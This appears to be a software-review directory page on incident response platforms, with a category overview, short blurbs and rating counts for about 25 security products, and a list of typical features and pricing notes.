Incident Response Platforms

Incident Response Platforms Overview

Incident response (IR) platforms guide countermeasures against a security breach and deploy preplanned, automated threat responses. Automated tasks can include threat hunting, anomaly detection, and real-time threat response via a playbook. After a breach, IR platforms can generate incident reports for analysis. Through IR software incident response may be planned, orchestrated and logged in accordance with policy, and best practice.


IR platforms may provide a response playbook designed to help contain and remediate breaches. Playbooks, or runbooks, are planned workflows that guide or automatically orchestrate responses to threats in real-time. These playbooks can be triggered by detecting known threats or incident types, and run in accordance with policy or SLA. For instance, the playbook may escalate a threat level if a high priority device is infected.


Through automated orchestration, incident response platforms help response teams minimize the time and resources required to manage incidents. IR platforms enable remediation teams to work on a broader scale and can identify and remediate network events that may have been missed due to a lack of resources.

Endpoint security and Incident response platforms have been thought of as separate categories. Endpoint security is a first-line defense mechanism for blocking known threats while incident response is the next layer and is all about hunting for endpoint threats and actively removing them. However, these categories are starting to merge into a new broader category often called Endpoint Protection and Response.

Incident Response Products

(1-25 of 32) Sorted by Most Reviews

AlienVault USM
287 ratings
385 reviews
Top Rated
TRUE
AlienVault® Unified Security Management® (USM) delivers threat detection, incident response, and compliance management in one unified platform. It is designed to combine all the essential security capabilities needed for effective security monitoring across cloud and on-premises environments, inclu…
CrowdStrike Falcon Endpoint Protection
21 ratings
13 reviews
CrowdStrike offers the Falcon Endpoint Protection suite, an antivirus and endpoint protection system emphasizing threat detection, machine learning malware detection, and signature free updating. Additionally the available Falcon Spotlight module delivers vulnerability assessment with no performance…
Proofpoint Threat Response Auto-Pull
8 ratings
3 reviews
Proofpoint Threat Response Auto-Pull (TRAP) enables messaging and security administrators to automatically retract threats delivered to employee inboxes and emails that turn malicious after delivery to quarantine. It is also a powerful solution to retract messages sent in error as well as inappropri…
D3 Security
0 ratings
1 review
D3 Security in Vancouver provides a platform for security orchestration, automation, incident response, as well as investigation and case management. Core components of the D3 platform include integrations with SIEM and threat intelligence platforms, a NIST-compliant playbook library, a case managem…
Agari Phishing Response
0 ratings
1 review
Agari in Foster City offers the Agari Phishing Response service, a phishing incident response system designed to accelerate phishing triage, forensics, remediation, and breach containment.
BlackBerry Optics (CylanceOPTICS)
2 ratings
1 review
BlackBerry Optics originated from Cylance, which became a Blackberry company from the early 2019 acquisition. BlackBerry Optics (formerly CylanceOPTICS) is an incident response solution emphasizing fast endpoint detection and automated smart threat response, root cause and context analysis, and othe…
Cofense Triage
3 ratings
1 review
Cofense Triage accelerates phishing qualification, investigation, and response by automating standard responses to suspicious emails to make analysts more efficient and driving out actionable intelligence, and providing incident response playbook.
Palo Alto Networks Cortex XDR
2 ratings
1 review
Cortex XDR from Palo Alto Networks is a detection and response app that natively integrates network, endpoint and cloud data to stop sophisticated attacks. Cortex XDR accurately detects threats with behavioral analytics and reveals the root cause to speed up investigations. Tight integration with en…
VMware Carbon Black EDR (formerly Cb Response)
2 ratings
1 review
Carbon Black EDR (formerly Cb Response) is an incident response and threat hunting solution designed for security operations center (SOC) teams with offline environments or on-premises requirements. Carbon Black EDR records and stores endpoint activity data so that security professionals can hunt th…
Cyber Triage
Basis Technology in Cambridge, MA offers Cyber Triage, an incident response software emphasizing the rapid and accurate collection of endpoint data, touted as better and more comprehensive than antivirus and ideal for non-forensics experts.
CenturyLink Analytics and Threat Management
With CenturyLink® Analytics and Threat Management services, you get the visibility needed to proactively identify potential security issues and respond to them before they cause harm. And with our event and incident management and response services, you can ease the burden of having to develop and …
Cobalt
Cobalt headquartered in Montreal offers their eponymous incident response platform.
TheHive
TheHive is an open source and free cybersecurity incident response platform.
Huntsman Analyst Portal
Australian company Huntsman Security offers the Huntsman Analyst Portal, an IR / SOAR security application designed to integrate with the company's flagship SIEM platform: Huntsman Enterprise SIEM.
1E Tachyon
1E headquartered in London offers Tachyon, an incident management and response product, providing guided remediation and an automated resolution process.
Barracuda Forensics and Incident Response
Barracuda Forensics and Incident Response automates response to email securirty incidences to ensure quick identification of the nature and scope of attacks, eliminate malicious emails, and carry out remediation actions to halt the attack’s progress and minimize damages.
Exigence
Exigence provides a command and control center software to manage major incidents. Exigence automates the collaboration among stakeholders within and outside of the organization and structures it around a timeline that records the steps taken to resolve an incident, to ensure all stakeholders are wo…
FireHydrant
FireHydrant is an incident management platform designd to allow users to resolve, learn, and mitigate incidents faster, from the company of the same name in New York.
RADAR
RADAR headquartered in Portland offers their incident response management software platform, providing breach detection and incident intake, automated escalation management, risk profiling and the company's Breach Guidance Engine, among other features.
Securonix SNYPR Platform
Securonix, from the Los Angeles-based company of the same name, offers the SNYPR Platform, an advanced analytics platform providing real time insights with identity data, threat hunting, and other security analytics capabilities. The SNYPR platform combines this with Securonix Response Bot, inciden…
Kaspersky Threat Management and Defense
Kaspersky Threat Management and Defense is a technology based solution for enterprises designed to automate threat detection and incident response workflows.
Cherwell Information Security Management Solution (ISMS)
The Cherwell Information Security Management Solution (ISMS) is designed based on a proven NIST framework for security incident response and remediation that allows organizations to handle incidents efficiently and effectively, as well as associate risk and incidents to change and ensure security co…
GravityZone Ultra
GravityZone Ultra is a complete Endpoint Security solution designed from the ground up as an integrated next-gen EPP and easy-to-use EDR. It offers prevention, threat detection, automatic response, pre and post compromise visibility, alert triage, investigation, advanced search and one-click resolut…
Cynet 360
New York based Cynet offers their intrusion detection and threat response platform Cynet 360, which monitors endpoints and networks, correlates and analyzes suspicious behavior, and provides automated remedial protection and manual remediation guidance to contain and eliminate cyber attackers.
Proofpoint ThreatResponse
Proofpoint Threat Response collects and analyzes threat forensic data to support orchestration of incident response.

Learn More About Incident Response Platforms

What are Incident Response Platforms?

Incident response (IR) platforms guide countermeasures against a security breach and deploy preplanned, automated threat responses. Automated tasks can include threat hunting, anomaly detection, and real-time threat response via a playbook. After a breach, IR platforms can generate incident reports for analysis. Through IR software incident response may be planned, orchestrated and logged in accordance with policy, and best practice.


IR platforms may provide a response playbook designed to help contain and remediate breaches. Playbooks, or runbooks, are planned workflows that guide or automatically orchestrate responses to threats in real-time. These playbooks can be triggered by detecting known threats or incident types, and run in accordance with policy or SLA. For instance, the playbook may escalate a threat level if a high priority device is infected.


Through automated orchestration, incident response platforms help response teams minimize the time and resources required to manage incidents. IR platforms enable remediation teams to work on a broader scale and can identify and remediate network events that may have been missed due to a lack of resources.

Endpoint security and Incident response platforms have been thought of as separate categories. Endpoint security is a first-line defense mechanism for blocking known threats while incident response is the next layer and is all about hunting for endpoint threats and actively removing them. However, these categories are starting to merge into a new broader category often called Endpoint Protection and Response.

Features of Incident Response Platforms

Incident response platforms may offer the following features:

  • Knowledgebase of regulations and best practice response plans

  • SIEM data ingestion, anomaly detection

  • Correlate data from SIEM, endpoints, and other sources

  • Pre-built customizable standards-based incident response playbooks

  • Automated response to security alerts

  • Process tree & timeline analysis to identify threats

  • Attack behavior analytics, for real-time detection & forensics

  • Access & credential lockdown, network access analysis

  • Isolation of infected systems, malicious files

  • Automate escalation to assign tasks to the right people

  • Service-level agreement (SLA) tracking and management

  • Forensic data retention for post-incident reporting, analysis

  • Remediation planning & process automation

  • Privacy breach reporting policy (e.g. GDPR) preparation

  • Compliance report issuance

Pricing Information & Availability

Incident response is very often offered as a service by cybersecurity outsourcing specialists. However strictly technology-based IR Platforms like those below are available to SOCs and in-house enterprise IT security teams. These offerings are often part of a suite from vendors specializing in cybersecurity software. In this case, they may be bundled with endpoint protection and antivirus applications from the same vendor. Vendors of IR software will boast integrations with popular SIEM applications, or other IT automation applications. Incident response platforms